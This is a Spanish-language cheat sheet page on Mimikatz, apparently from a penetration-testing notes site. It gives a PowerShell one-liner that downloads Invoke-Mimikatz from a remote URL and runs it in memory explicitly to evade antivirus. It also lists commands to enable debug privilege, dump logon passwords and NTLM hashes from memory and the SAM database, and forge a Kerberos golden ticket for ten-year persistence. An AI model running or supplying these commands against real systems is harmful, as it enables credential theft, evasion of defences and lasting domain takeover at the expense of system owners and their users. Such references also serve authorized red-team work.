Appearance
Mimikatz
La navaja suiza para la seguridad de Windows. Permite extraer credenciales en texto plano, hashes, tickets Kerberos y más desde la memoria.
Requiere Privilegios
Necesitas ser Administrador o SYSTEM para ejecutar la mayoría de comandos.
⚡ One-Liners (PowerShell)
Cargar Mimikatz directamente en memoria (sin tocar disco para evadir AV básico).
powershell
# Cargar desde repositorio remoto (Invoke-Mimikatz)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds💻 Comandos Interactivos
Ejecuta mimikatz.exe y usa estos comandos:
1. Elevar Privilegios (Debug)
Necesario antes de volcar credenciales.
cmd
privilege::debugSalida esperada: Privilege '20' OK
2. Volcar Credenciales (LogonPasswords)
Extrae usuarios y contraseñas (si wdigest está activo) o hashes NTLM.
cmd
sekurlsa::logonpasswords3. Volcar SAM (Base de datos local)
Obtiene hashes NTLM de usuarios locales.
cmd
lsadump::sam4. Golden Ticket (Persistencia Total)
Si tienes el hash KRBTGT, puedes crear un ticket válido por 10 años.
cmd
kerberos::golden /user:Administrator /domain:dominio.local /sid:<SID> /krbtgt:<HASH> /id:500